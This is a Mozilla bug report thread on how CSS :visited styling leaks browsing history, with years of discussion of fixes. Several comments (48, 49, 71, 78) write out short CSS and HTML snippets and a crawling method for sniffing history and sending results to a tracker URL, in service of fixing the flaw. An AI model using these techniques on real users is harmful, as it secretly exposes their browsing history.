Closed
Bug 147777
Opened 22 years ago
Closed 15 years ago
:visited support allows queries into global history
Categories
(Core :: CSS Parsing and Computation, defect, P1)
Core
CSS Parsing and Computation
Tracking
()
RESOLVED
FIXED
mozilla1.9.3a4
People
(Reporter: dbaron, Assigned: dbaron)
References
(Depends on 3 open bugs, Blocks 1 open bug, )
Details
(Keywords: dev-doc-complete, privacy, Whiteboard: [sg:want P1][please read comments 12, 23, 35, 43, 65-68, 70, 102-103 before commenting])
Attachments
(33 files, 6 obsolete files)
1.20 KB,
text/html
|
Details | |
50.48 KB,
patch
|
Details | Diff | Splinter Review | |
1.58 KB,
text/html; charset=UTF-8
|
Details | |
3.84 KB,
text/html; charset=UTF-8
|
Details | |
1.55 KB,
text/html; charset=UTF-8
|
Details | |
1.43 KB,
text/html; charset=UTF-8
|
Details | |
4.39 KB,
patch
|
bzbarsky
:
review+
bzbarsky
:
superreview+
|
Details | Diff | Splinter Review |
8.48 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
4.27 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
6.81 KB,
patch
|
roc
:
review+
|
Details | Diff | Splinter Review |
36.57 KB,
patch
|
zwol
:
review+
|
Details | Diff | Splinter Review |
9.73 KB,
patch
|
zwol
:
review+
|
Details | Diff | Splinter Review |
2.61 KB,
patch
|
zwol
:
review+
|
Details | Diff | Splinter Review |
19.21 KB,
patch
|
zwol
:
review+
|
Details | Diff | Splinter Review |
1.70 KB,
patch
|
bernd_mozilla
:
review+
|
Details | Diff | Splinter Review |
9.90 KB,
patch
|
zwol
:
review+
|
Details | Diff | Splinter Review |
32.22 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
29.23 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
10.36 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
3.89 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
1.13 KB,
patch
|
sdwilsh
:
review+
|
Details | Diff | Splinter Review |
2.06 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
12.21 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
4.54 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
7.43 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
17.17 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
8.23 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
48.29 KB,
patch
|
Details | Diff | Splinter Review | |
5.39 KB,
patch
|
Details | Diff | Splinter Review | |
7.02 KB,
patch
|
jwatt
:
review+
|
Details | Diff | Splinter Review |
7.18 KB,
patch
|
bzbarsky
:
review+
|
Details | Diff | Splinter Review |
15.46 KB,
patch
|
sdwilsh
:
review+
|
Details | Diff | Splinter Review |
6.17 KB,
patch
|
jwatt
:
review+
|
Details | Diff | Splinter Review |
We should have a pref for :visited support, since there are some things that can
be determined about the user's history (and perhaps used for other exploits if
one knows they use one-click amazon purchasing, or a certain bank, etc.) using
:visited rules. (These include using GetComputedStyle or using generated
content or 'display: none' to cause server hits. The latter could be fixed with
a parallel style context tree (in limited cases), which could allow the pref to
disable rules only in author-level stylesheets, but that's quite a bit of work.)
Assignee | ||
Comment 1•22 years ago
|
||
s/latter/former/
Assignee | ||
Updated•22 years ago
|
Status: NEW → ASSIGNED
Priority: -- → P1
Target Milestone: --- → mozilla1.1beta
Assignee | ||
Updated•22 years ago
|
Target Milestone: mozilla1.1beta → mozilla1.1alpha
Assignee | ||
Comment 2•22 years ago
|
||
This is an untested implementation of the pref backend, with a pref name that I
don't like. (Suggestions for a better one?)
Assignee | ||
Comment 3•22 years ago
|
||
On second thoughts, perhaps a better option for users who really care about this
would be a pref to disable them only in author stylesheets to fix the content
loading issue, combined with disabling JS (and any other scripting languase) to
fix the GetComputedStyle issue. This would have the major advantage that link
coloring would still work.
Comment 4•22 years ago
|
||
> ... with a pref name that I don't like. (Suggestions for a better one?)
browser.disable_visited_pseudoclass?
Assignee | ||
Comment 5•22 years ago
|
||
My comment "The latter could be fixed with a parallel style context tree (in
limited cases), which could allow the pref to disable rules only in author-level
stylesheets, but that's quite a bit of work." in comment 0 is incorrect, since
it doesn't fix issues with computed width/height/offsets or with things like
offsetTop.
Assignee | ||
Comment 6•22 years ago
|
||
However, one could make a pref that both disables :visited in author stylesheets
and hacks GetComputedStyle to fake the color (since that's the only thing in the
UA and presumably user stylesheets).
Comment 7•22 years ago
|
||
ew
Comment 8•22 years ago
|
||
Marking sensitive after discussing w/dbaron.
Unfortunately it appears impossible to resolve the privacy leak and fully obey
the spec at the same time.
Group: security?
Comment 9•22 years ago
|
||
That's OK, that's why this feature will be optional. The spec has a privacy
problem, so we let users choose to follow the spec or protect their privacy.
That's the best we can do apart from lobbying to change the spec.
Comment 10•22 years ago
|
||
In the old days surfing HTML was safe from this leak, and you still got to see
the colors on your links. The patch above turns off *all* visited styles, and
that would so break things we couldn't do anything but default to current
behavior. This might be a reasonable stopgap to check in just in case some big
flap comes up, although since MS is also vulnerable, and it's really the spec's
fault we might not come under great pressure to fix this immediately.
If you're going to use the "browser" pref namespace avoid sticking right on the
root, it's too crowded already. Maybe something like
browser.display.show_visited_style (s?)
There's also the dom namespace. This isn't exactly dom, though most of the leaks
other than loading images would happen through the DOM. If we expect future CSS
tweaks we could start browser.css.* or css.*
Assignee | ||
Updated•22 years ago
|
Summary: pref for :visited support → :visited support allows binary lookups in global history
Target Milestone: mozilla1.1alpha → mozilla1.1beta
Assignee | ||
Updated•22 years ago
|
Summary: :visited support allows binary lookups in global history → :visited support allows queries into global history
Assignee | ||
Comment 11•22 years ago
|
||
Assignee | ||
Comment 12•22 years ago
|
||
This is work in progress on a real fix for the exploit. This is only the first
(and easier) part of the patch. (It also needs more testing, but I'll test it
more once I have the whole thing.) This approach doesn't do any caching of the
special style contexts -- if I did, I'd have to worry about invalidation of the
cache, and that would be a real pain. It might be worth doing caching at some
point (and for nsComputedDOMStyle objects in general), but this shouldn't be
significantly slower in the normal (no :visited) case than the current
implemenation. This patch also should fix a bunch of bugs in GetComputedStyle
returning the wrong data for content nodes that don't have frames or for
pseudo-elements.
The second part of the patch (not yet written) will be to do rule splitting of
some sort to prevent some properties from applying when the selector has
:visited. This will prevent exploits using specification of properties and use
of GetComputedStyle for properties where it looks at frame geometry, etc., or
use of offsetTop of the frame in question or for other frames. (For the time
being, this will have to block anything that can load an image, although in a
later patch I'd like to start loading background images from stylesheets and
then unblock background images, which I think are a legitimate style for
:visited links (as are :before images).)
Attachment #85392 -
Attachment is obsolete: true
Assignee | ||
Updated•22 years ago
|
Target Milestone: mozilla1.1beta → mozilla1.2alpha
Comment 13•22 years ago
|
||
(I take it you mean _pre_load _all_ background images from stylesheets, whether
they are used or not, rather than just loading background images, which we do
already, and which is the problem.)
This seems like an awfully large amount of code to work around an exploit which
is basically academic.
Comment 14•22 years ago
|
||
Hey Ian, come spend more time in "the land of the free". Back in the 50's
people's lives were ruined because they once checked a "communist" book out of a
library, and more recently people have been thrown in jail for giving money to a
charity that it turns out gave money to people who turned out to also support
terrorism. I don't think protecting history is being too paranoid. This could
easily be used for targetted snooping via e-mail.
Comment 15•22 years ago
|
||
I'm not saying we shouldn't do this. But to be honest, it isn't that easy to get
personal information out of the global history. You can do things like check if
the user has gone to a specific page (such as http://www.i-like-communism.com/)
but you can't do anything like get passwords out of the session history. Seems
to me that any scenario where this is going to be a problem is one where the
user is likely to be paranoid about using unencrypted plain text protocols and
having the history stored at all anyway. That kind of situation is probably best
worked around by using a "privacy mode" where the global history is not affected.
I think we should definitely fix this using dbaron's approach. dbaron's patch
looks bigger than it really is because he's moving code around.
We should also make this bug public given that every browser out there has the
same vulnerability (right?) and it's not TOO serious.
Ian: note that using this attack, someone can check to see if you've visited
https URLs as well as http URLs.
I can imagine, say, Amazon using this to see how many of their customers are
also visiting their competitors.
Depending on how the competitors' sites are organized, Amazon might even be able
to guess WHAT they're buying.
Assignee | ||
Comment 18•22 years ago
|
||
But that is only really one third of the patch, so far. I still need to do the
property blocking and the loading images from the stylesheet.
Comment 19•22 years ago
|
||
roc: I would be incredibly impressed if someone wrote an exploit of this bug
which got out more information than "you visited our competitor's site",
information which is frankly less of an issue than referrer-tracking.
Assignee | ||
Comment 20•22 years ago
|
||
This bug worries me because we don't really know the implications of knowing
that someone has recently visited a particular URL. It could be used in rather
subtle ways.
Therefore I'm marking "mustfix" which means we want a fix soon.
Whiteboard: [sg:mustfix]
Comment 22•22 years ago
|
||
David, we're still interested in getting a fix for this, probably for Moz 1.3.
Are you still working on this?
Assignee | ||
Comment 23•22 years ago
|
||
I've been thinking about this a bit. The second part of the patch (see comment
12) requires per-property knowledge. Implementing this in the current CSS
backend scares me, because everything is done in massive case statements instead
of using a preprocessable list of properties -- this makes it very easy to miss
properties, etc., especially when people start adding new properties. I'd be
much more comfortable doing this if the current CSS backend were cleaner.
I also still need to solve the puzzle of exactly how to expand selectors for
property blocking. It's clear that any selector using :visited doesn't apply
for the blocked properties. But what's the opposite? Do we turn all the :link
in other selectors into :-moz-any-link for the blocked properties, or one at a
time, or something else? I suspect the answer is all, but I haven't had time to
sit down and prove it to myself. (Consider selectors with multiple :link and
:visited separated by various combinators.)
This is also going to end up being a very complex patch that will need thorough
review. (After all, it would essentially create two new security systems, one
for property blocking (which is probably not a bad name -- I need to come up
with a better one) and one for lying during DOM access to unblocked properties.)
I'm tempted to include intentional mistakes in the patch and not accept the
reviews until the reviewers catch the intentional mistakes (and probably some
unintentional ones as well).
Comment 24•22 years ago
|
||
David, we'd really like to get that patch - can you give us an ETA? Maybe for
1.3 alpha?
Assignee | ||
Updated•22 years ago
|
Target Milestone: mozilla1.2alpha → mozilla1.3beta
Comment 25•22 years ago
|
||
*** Bug 57351 has been marked as a duplicate of this bug. ***
Comment 26•22 years ago
|
||
So... given that there's a public exploit of this bug at:
http://www.gemal.dk/browserspy/css.html
can this be made public?
Comment 28•21 years ago
|
||
Woudln't loading all referenced images in the stylesheet solve part of this
problem? This is already done for pieces of content that have been hidden using
display:none.
This would prevent malicious users from looking at their logs to see which pages
have been visited and which not.
Assignee | ||
Comment 29•21 years ago
|
||
That's part of the plan, in a sense, although if it's not done first those
properties could be "blocked". See comments above, I think, if I mentioned it...
Assignee | ||
Comment 30•21 years ago
|
||
(Yes, the end of comment 12.)
Assignee | ||
Updated•21 years ago
|
Target Milestone: mozilla1.3beta → mozilla1.5beta
Comment 31•21 years ago
|
||
*** Bug 223288 has been marked as a duplicate of this bug. ***
Comment 32•21 years ago
|
||
*** Bug 224954 has been marked as a duplicate of this bug. ***
Comment 33•21 years ago
|
||
http://lists.insecure.org/lists/bugtraq/2002/Feb/0271.html - few words about
possible use of this hole.
Assignee | ||
Comment 34•21 years ago
|
||
Assignee | ||
Comment 35•21 years ago
|
||
This test shows that the approach I was originally planning to take is
insufficient. However, I think it would work if we always resolved both the
style-if-visited and style-if-unvisited. I can't see any way that the time
resolving the style on the descendants would be any different. Even if we keep
both around (which I think is necessary to prevent timing exploits like this
one), we can't use these (much, anyway) for GetComputedStyle, though, since
descendants would still have the correct (and tainted) inherited data.
Assignee | ||
Updated•21 years ago
|
Assignee | ||
Comment 36•20 years ago
|
||
A strategy for fixing this:
* make each style context have a mLinkNext pointer so everything that's a style
context now becomes a linked list of style context.
* each element that's not a link resolves each element of its list the same as
its parent
* each element that is a link resolves each element of its list the same as its
parent as if it's its correct link state, and then as if it's its opposite link
state
* we use bits somewhere to indicate which one of the elements in the list is
the "totally unvisited" state, and nsComputedDOMStyle uses that one
* every GetStyleData call resolves the style data on all style contexts in the
chain (and we need to make two calls for nsComputedDOMStyle so there's no
performance difference for unresolved data)
Assignee | ||
Comment 37•20 years ago
|
||
s/element/style context/g
Oh, and everything that loads URL values manually (rather than using
CSSValue::Image), e.g., -moz-binding, needs to load all the URLs in the chain.
Assignee | ||
Comment 38•20 years ago
|
||
... actually not. The things that load the URLs manually could still just do
the property blocking, which we still need to do in addition to the above (since
it only fixes (1) and (3)).
Assignee | ||
Comment 39•20 years ago
|
||
Oh, and we also need to be careful with HasStateDependentStyle and
HasAttributeDependentStyle -- they need to check for a change given any possible
link state.
Assignee | ||
Comment 40•20 years ago
|
||
And we also need to be careful to load the images in the same order whether or
not the links are visited.
Assignee | ||
Comment 41•20 years ago
|
||
We also need to either block sibling combinators with :link or :visited above or
turn them into :link-only.
Assignee | ||
Comment 42•20 years ago
|
||
There are also performance attacks possible related to a lot of specific
properties (e.g., transparency in images), so actually this approach is probably
overkill, since we don't need the linked list to start all the image loads.
Assignee | ||
Comment 43•20 years ago
|
||
Given that, I'm actually beginning to think that the only safe property is 'color'.
Comment 44•20 years ago
|
||
*** Bug 287481 has been marked as a duplicate of this bug. ***
Comment 45•19 years ago
|
||
(In reply to comment #43)
> Given that, I'm actually beginning to think that the only safe property is
'color'.
Sorry for my possibly amateur approach (C++ no), but I think that you are
digging from a wrong side of the hill.
This vulnerability exposed by some style properties of links pointing to outside
domains. So the solution should be not by blocking their functionality, but by
blocking read access to the outside links properties. I mean it should be the
input-file / frame approach: you can set but you cannot read, even you if you
set it by yourselve. Something like:
onLinkStylePropertyChangeRequest
// everything as it is right now
onLinkStylePropertyReadRequest
if LinkInThisDomain
ReturnRequestedProperty
else
RaiseSecurityExeption
Assignee | ||
Comment 46•19 years ago
|
||
The point is that there are many other ways to use this attack than reading the
link's properties.
Comment 47•19 years ago
|
||
(In reply to comment #46)
> The point is that there are many other ways to use this attack than reading
the
> link's properties.
But only visited link properties are really a serious privacy flow. It allows
you to effectively check hundreds and thousands of links almost with *no*
effect on user's traffic and *without* queries to other sites.
Timed element loading is more a jeu d'esprit rather than a practical spying
technology. Enormous traffic growth (plus visible requests to outside) make it
unusable. You have to be a desperate idiot and not a professional spyer to
jump on it. XMLHttpRequest is good as well for it. So lock XMLHttpRequest
either?
Visited link properties is an effective way ro spy.
At the same time there is absolutly no way to block any of these properties if
you want to keep your browser usable.
So I suppose the only way is to put all links within the current page to a
FRAME-style sendbox. So apply any styles you want, but if you want to read it -
then sorry, no.
And 3W should get a text like "For security and privacy reasons read-access to
link style properties *may be* restricted by a particular sofware producer if
the link points outside of the current domain."
Send them this right now, let them start inserting it to the appropriate sub-
paragraph article XXXXXX section YYYYYY or wherever, so anyone would get
buzy :-)
Comment 48•19 years ago
|
||
You can do:
#mozillaorg:visited{backround:url(img)}
You could also do:
#mozillaorg:visited+span{color:green}
... and read the color of that span element through javascript. Etc.
Comment 49•19 years ago
|
||
Right, or you can use rules like
a.snoop span { display: none }
a.snoop:visited span { display:inline }
and then generate a pile of
<div id="foo">
<a class="snoop" href="http://www.funroll-loops.org">www.funroll-loops.org</a>
<a class="snoop" href="http://www.mozilla.org">www.mozilla.org</a>
...
</div>
and XMLHttpRequest-send document.getElementById("foo").innerHTML your way to
browsing history.
Or any of the other test cases attached to this bug which don't rely on directly
sampling via GetComputedStyle. None of those require extra traffic, or need to
be visible to the user in any way, other than the report-home mechanism common
to all such attacks.
dbaron wasn't kidding in comment 46.
Assignee | ||
Comment 50•19 years ago
|
||
Did you even look at the testcases in attachment 135345 [details] and attachment 135350 [details]?
(The latter isn't 100% reliable, but it could be improved.) Those only even
scratch the surface.
Comment 51•19 years ago
|
||
I'm pointing you again to my comment #47.
All these samples are using access to a:visited style properties. Actually I'm
wondering why everyone got so fixated on colors? Must be a tradition pressure,
because it can be any style property: margin, padding, font, size etc. etc. I
could fill this topic with hundreds of similar test cases.
Again, there are only two possible variants: either just leave it, or put an
extra sandbox rule on JavaScript engine (Set - any, Get – only properties of
links within the current document.domain). The latter kills the problem on the
root, but it’s definitely 3W-sensitive.
Also all kind of “timed loading” exloits should be removed from this and any
other topic as irrelevant and unfixable. Absolutely nothing you can do here
without locking 99% of browser functionality.
As a consolation I can say that this case is more an attempt to be “more
catholic than Pope”. No one DoubleClick-level spyer will ever use any of these
exploits, like never a mafia boss will start grabbing purses on the street.
They have absolutely other techniques and approaches. The small net-trash can
use it (and using it), but what can you really ask from a trash?
Comment 52•19 years ago
|
||
> All these samples are using access to a:visited style properties.
See comment 50, please. Again. Attachment 135345 [details], for example, never accesses
a style property on an a:visited. Please stop with the uninformed advocacy, ok?
Comment 53•19 years ago
|
||
> See comment 50, please.
> Again. Attachment 135345 [details] [edit], for example,
> never accesses a style property on an a:visited.
Wow! That a proof for the 5th Parkinson-Murphy law!
I tried to play chess against of myself and I lost every time. I see this flow
cannot be solved without a severe violation of the "browsing experience". Mark
it as a "system feature"?
>Please stop with the uninformed advocacy, ok?
OK, no problem.
All I wanted to say that IE is wide open to this exploit as well. So in
the "Empire strikes back" attack it cannot be used against of you. I had a
nightdream that you have really weaked up the Big M with your Firefox, and
that it will use on you all your defaults by the all spirits day. So maybe
just skeep on it right now?
Updated•19 years ago
|
Whiteboard: [sg:mustfix] → [sg:fix]
Comment 54•19 years ago
|
||
Given the breadth of attacks here, and the tension between the CSS specification
and some of the restrictions proposed, moving this back to investigate.
Whiteboard: [sg:fix] → [sg:investigate]
Assignee | ||
Comment 55•19 years ago
|
||
Comment 56•19 years ago
|
||
Another approach would be to have :link/:visited elements have different z-indices and then use onmouseover to find out which elements got the events when the user swipes the mouse from side to side (trivial to enduce if the user is playing a game, e.g.).
Updated•19 years ago
|
Whiteboard: [sg:investigate] → [sg:want P4]
Assignee | ||
Comment 57•18 years ago
|
||
For what it's worth, this is attachment 87324 [details], modified with a code fork for WinIE (where it does not support a standard DOM method but supports an equivalent proprietary one). It shows that WinIE6 is vulnerable; I'm curious if the claims that this is fixed in IE7 are correct.
Assignee | ||
Comment 58•18 years ago
|
||
Actually, it seems that href="" also doesn't work on WinIE in some cases, which I think is an additional bug that makes all these testcases fail (say "exploit not present", even if it is) in WinIE. Since I can't predict the attachment URLs that I'm going to get, and since attachments are visible using multiple URLs, I'll use this bug's URL as a template for a visited URL.
Assignee | ||
Updated•18 years ago
|
Attachment #235461 -
Attachment is obsolete: true
Comment 59•18 years ago
|
||
see also http://jeremiahgrossman.blogspot.com/2006/08/i-know-what-youve-got-firefox.html
which shows how its possible to detect some of the installed Firefox extensions using the chrome: protocol handler. I'm not sure if that is a security threat, but its definitely a privacy issue.
Assignee | ||
Comment 60•18 years ago
|
||
Comment 59 does NOT belong on this bug. Please file it as a separate bug report.
Comment 61•18 years ago
|
||
http://crypto.stanford.edu/sameorigin/ references this bug, and their solution is to use the referer column in history (as implemented in bug 128398 ) to control access to the global history. This does seem to work, however I'll note that the referer is only set if the referer is currently blank - ie it's only set once per history entry.
Assignee | ||
Comment 62•18 years ago
|
||
*** Bug 354861 has been marked as a duplicate of this bug. ***
Comment 63•18 years ago
|
||
From dup bug:
Descr.: http://archives.neohapsis.com/archives/fulldisclosure/2006-09/0547.html
Paper: http://www.spidynamics.com/assets/documents/JS_SearchQueryTheft.pdf
Proof of Concept: http://www.spidynamics.com/spilabs/js-search/index.html
Comment 64•18 years ago
|
||
(In reply to comment #61)
> http://crypto.stanford.edu/sameorigin/ references this bug, and their solution
> is to use the referer column in history (as implemented in bug 128398 ) to
> control access to the global history. This does seem to work, however I'll note
> that the referer is only set if the referer is currently blank - ie it's only
> set once per history entry.
Actually, we modify the referer field to store a list of all referers, rather than just the first one.
Collin Jackson
Assignee | ||
Comment 65•18 years ago
|
||
So, for what it's worth, a CSS approach that would fix the known exploits here is, I think:
1. When computing style for visited links, use the style that matches :link, except for the RGB components (not the alpha component) of the color and background-color properties, where we use the style that matches :visited
2. Make getComputedStyle lie about those two properties (i.e., act as though the link is unvisited)
Comment 66•18 years ago
|
||
(In reply to comment #65)
> So, for what it's worth, a CSS approach that would fix the known exploits here
> is, I think:
It is true that these proposed changes make attacks more difficult and are likely to work well with most sites. Although I support these changes, I would like to point out that they don't fix all of the known exploits.
1) It would still be possible for an attacker to construct a convincing phishing page that looks like Wells Fargo to a Wells Fargo customer and Citibank to a Citibank customer. An attacker could simulate the images as a grid of 1 pixel hyperlinks, and simulating the text should be straightforward. JavaScript could be used to ensure that the user doesn't accidentally click through to the real site, and once the credentials have been stolen it would be straightforward to try them at both sites.
2) It would still be possible for an attacker to learn information about the user's history at other sites based on where they click and don't click. For example, and attacker could have a huge link that says "Click here" and only users with a certain history entry would see it and click it because it blends in with the background otherwise.
Assignee | ||
Comment 67•18 years ago
|
||
Ah, right. Then I think we need to take a non-CSS approach to solving this, such as storing all referring domains to a link in global history, and only allowing styling if the page is in the referring domain.
(Would be great to have the effective-TLD-service for that, I suppose.)
Target Milestone: mozilla1.5beta → ---
Comment 68•18 years ago
|
||
I think I prefer the CSS approach. I don't mind if an attacker can find out whether I've visited a given page, one URL at a time, with user interaction (not cooperation). But I do want visited link coloring to work on all the blogs I visit, even if I haven't clicked a given link from that blog before.
Comment 69•18 years ago
|
||
Even if we fix this, another way is still available, see bug 363897
Comment 70•18 years ago
|
||
I'm with Jesse, the approach dbaron lays out would stop the wholesale testing of history in a hidden frame. It's a huge win even if it's not 100% foolproof.
Comment 71•18 years ago
|
||
Does the approach from comment 65 also take the following scenarios into account (and variants):
a:visited + span { color:blue }
a#bbc-co-uk:visited { background:url(tracker.cgi?bbc.co.uk) }
Comment 72•18 years ago
|
||
Compare bug 371375 with same or similar effect, but other method.
Comment 73•18 years ago
|
||
Note sure whether already reported here, but RSnake had an idea how to use this without JavaScript enabled, by combining CSS :visited with CSS background-image.
http://ha.ckers.org/blog/20070228/steal-browser-history-without-javascript/
Assignee | ||
Comment 74•18 years ago
|
||
(In reply to comment #73)
> Note sure whether already reported here,
It is. See, e.g., comment 12 and comment 61.
Assignee | ||
Comment 75•18 years ago
|
||
er, sorry, comment 12 and comment 71.
Comment 76•18 years ago
|
||
Another site which demonstrates the problem:
http://gemal.dk/browserspy/css.html
Assignee | ||
Updated•18 years ago
|
QA Contact: ian → style-system
Comment 77•17 years ago
|
||
(In reply to comment #14)
> Hey Ian, come spend more time in "the land of the free". Back in the 50's
> people's lives were ruined because they once checked a "communist" book out of a
> library, and more recently people have been thrown in jail for giving money to a
> charity that it turns out gave money to people who turned out to also support
> terrorism. I don't think protecting history is being too paranoid. This could
> easily be used for targetted snooping via e-mail.
pleas to not make FF pile of **** like IE!
but seriously you're making some stupidity assertion there, for instance, if you're browsing some forum and *give your email address* requesting a full set of some child porn or snuff it is *your sole responsibility* to make sure you don't load any web bugs in email messages feds sent you and noone should make any assertions on what *might* the end user's privacy preferences be or more like - privacy settings should be turned on not turned off from the default.
Updated•17 years ago
|
Blocks: historyleak
Comment 78•17 years ago
|
||
I've been experimenting with this behaviour and found that you can do better than just guessing random URLs and seeing if they have been visited or not. The following methods may be obvious, but I've not seen it talked about anywhere:
1. Guess a few starting URLs that the user is likely to have visited (e.g planet.mozilla.org, slashdot.org, news.bbc.co.uk) and put them on a webpage.
2. Detect which URLs have been visited
3. For each visited URL, make a background request to a server that will fetch a copy of the URL and return a list of links on that page.
3. Add those links to the current page
4. Goto 2
Using this method, a website can interactively search through your history and find pages you've visited that couldn't be guessed easily (provided they're public webpages).
Another interesting thing that can be done since bug 78510 was fixed is to know in real time when someone clicks on a link. For example, you could visit a page that did the kind of tracking described above, then keep it open in a background tab. If I click on a story on slashdot that I've not read before, that link will immediately become 'visited' on the tracking page. The tracking page will then fetch all the links on that page. It could then follow me as I look at a wikipedia page linked from the comments, and any subsequent pages linked from there.
I've made a proof of concept of this (using only CSS, no JS required) and it works pretty well. Now that Firefox 3 stores 90 days of history, it can dig up a good number of pages I've visited.
Comment 79•17 years ago
|
||
This is an interesting idea.
It has two limitations, though: 1. it is resource-intensive, making it more likely to be noticed and detected, 2. you will only find pages linked (indirectly) from those popular pages. I.e. you will see which news I followed, but not the website of my friend, whose address I typed in the urlbar.
Creative exploit of this bug:
http://azarask.in/blog/post/socialhistoryjs/
Updated•16 years ago
|
Flags: wanted1.9.1?
Comment 81•16 years ago
|
||
Comment 82•16 years ago
|
||
Workaround till this is fixed is to use the SafeHistory extension from http://crypto.stanford.edu/sameorigin/stanford-safehistory-0.9.xpi
Comment 83•16 years ago
|
||
Hello,
Sorry to up this old topic after all this time. I would like to share some thoughts about this problem.
_First_, as someone said before, and given the importance of this issue (comment #78 explains very well, in my opinion, a scary way to exploit this, for example), i think we should "restrict" (see next point) by default the effect of :visited pseudo class on links to a different origin than the current page. Maybe we can add a preference to disable that privacy feature, if people still want the present functionality unrestricted.
A sort of "choose between privacy and functionality" preference. That way, users can still get the full site design on :visited links if they absolutely want it, but by restricting by default, and forcing the user to understand the implications of what they do before they allow the full functionality, we put the responsibility on the user to choose the fancier path instead of the safe one. In other words, if someone gets his history stolen after they allow it, they cannot say it's Mozilla's fault.
_Second_, as to the way of "restricting" :visited on foreign domain links, i see a few, while keeping various levels of functionality :
1) As some people already suggested, just act as if those links were not visited, whether it's true or not. Certainly the safest path, and the easiest to implement, but again, we lose the functionality of knowing whether they are visited or not...
2) Ignore the CSS :visited pseudo-class on those foreign-domain links, and put the emphasis on the visited links in an arbitrary way chosen by the browser. It will be the same for every site, no matter what CSS there may be, and in a way that no script or CSS can know whether it was visited or not.
For example, you could add a little image with "position: absolute" on the right of the text links to show that it is visited, an image that could not be accessed by the DOM (or by CSS selectors, of course). Since it is absolutely positioned, it would not change the geometry of the document. You could as well invert the background color of the given link, or change the text-decoration, or whatever that doesn't change the geometry and the DOM of the document. Of course, for properties modified like this, getComputedStyle should not return the actual "real" value. This has the main advantage of still showing to the user wich links he has visited or not, even if it is in an "ugly" way, that doesn't integrate very well with the visited site's design.
In other words, trade some design possibilities for privacy, while keeping the full functionality of showing visited links.
3) Allow a *white-list* based list of CSS properties that could be set for :visited links. Those properties could be set by the CSS for the links (or even any children or sibling element, depending on the selector used), but getComputedStyle should not be able to read it (it should read the value the property would have if the given link was treated as never visited). The white-list should be carefully chosen, from the properties that don't change the geometry of the document, for example color, background-color, background-image (in that case, it should be downloaded even if the person has not visited the link, of course), text-decoration, font-style (if we can assume that italic and oblique text always has the same width and height as "normal" text)...
This is a more flexible way, preserving most of the design possibilities for the site designers, while still letting the user know wich links he has gone to.
It is also probably the hardest to implement of the three, because for example you need to keep track of what properties were set with CSS rules that depend on a :visited selector.
Also keep in mind that those restrictions (whatever way you choose) would only apply to links that point to foreign domains, so any site can still do whatever it wants with his own links.
Well, sorry, this was quite a long post, but i hope it can be helpful.
Comment 84•16 years ago
|
||
The thing is... doing that origin compare is likely to be expensive. For typical pages, "noticeably slower pageload" expensive, if I recall the numbers right for how many history lookups happen.
Comment 85•16 years ago
|
||
I don't understand the reason for all the comments about how it will change page layout, etc.
Let the :visited do it's thing on the page and restrict the _javascript_ from reading it! Simply pretend all, different origin, visited links are unvisited when javascript reads them. This should break almost nothing - how often does javascript need to read such things?
Assignee | ||
Comment 86•16 years ago
|
||
(In reply to comment #85)
> Let the :visited do it's thing on the page and restrict the _javascript_ from
> reading it! Simply pretend all, different origin, visited links are unvisited
> when javascript reads them. This should break almost nothing - how often does
> javascript need to read such things?
Please read the 84 comments prior to yours to see why this won't work. (Sorry, I don't have time to find the right ones right now -- but that's what happens when the bug has too many comments on it.)
Comment 87•16 years ago
|
||
(In reply to comment #86)
> I don't have time to find the right ones right now -- but that's what happens
> when the bug has too many comments on it.)
>
I saw this many times so filed bug 451684
Flags: wanted1.9.1?
Flags: wanted1.9.1-
Flags: blocking1.9.1-
Comment 88•16 years ago
|
||
(In reply to comment #86)
> (In reply to comment #85)
> > Let the :visited do it's thing on the page and restrict the _javascript_
> > from reading it! [...]
>
> Please read the 84 comments prior to yours to see why this won't work
> I have time to find the right ones right now
Comment #73, comment #48, comment #49, comment #50 : there might be some other before, but those are telling enough.
Comment 89•16 years ago
|
||
(In reply to comment #84)
> The thing is... doing that origin compare is likely to be expensive. For
> typical pages, "noticeably slower pageload" expensive, if I recall the numbers
> right for how many history lookups happen.
I think the approach Jordan Osete describes is probably the best... Only match :visited when the link has the same origin as the containing file. The code complexity would be minimal, the fix would be easy to implement and explain.
People would lose the ‘visited’ indication on links to foreign sites, which might be slightly annoying on sites like e.g. Digg, but you still keep the functionality on sites with many same-domain links such as blogs. Some kind of preference/per-page-setting would be useful, so that e.g. Thunderbird or NoScript can disable this limitation (given that they do not allow JS to execute in content), and people who do not care much for the security issue as well.
You say that adding a same-origin check causes considerable overhead, but by definition :visited itself needs to compare the link with the entire history (or at least a subset thereof)... surely that massively outweighs the overhead of a simple same-origin check (where you do not even have to compare the entire URI, just the domain part)?
If you really do want to cater to foreign links, you could implement the referer-thing mentioned in comment 61 which should suffice for all practical uses of :visited, although of course at a more significant performance trade-off. (But then again, one might consider the Referer HTTP header a security issue of its own right :), and if you are not going to ‘fix’ Referer, why would you bother with :visited?)
Another way to retain partial functionality for foreign links would be to set a flag on a link once it gets activated, so that at least as long as the page is not reloaded or still in the fastback-cache, the links show up as visited.
Comment 90•16 years ago
|
||
Laurens, comparing "just the domain part" is actually more expensive than comparing the whole URI. And history is a database; it's not like we're doing a linear search through it.
In the past, something as simple as minor tweaks to URI parsing has significantly affected the :visited codepath's performance and had noticeable effects on pageload time. It's a _very_ hot codepath during pageload. I suggest you do some profiling and read some of the old bugs on the issue, or just talk to sdwilsh about the problems he's running into now with his history work.
Comment 91•16 years ago
|
||
Sorry, but I really do not understand why this would be slower.
I mean, currently we do a _full_ history lookup for EVERY link in the page.
With my proposal, we only do ONE origin compare for every link, and a full history lookup ONLY on those links that come from a same origin.
If anything, shouldn't it be faster ?
Comment 92•16 years ago
|
||
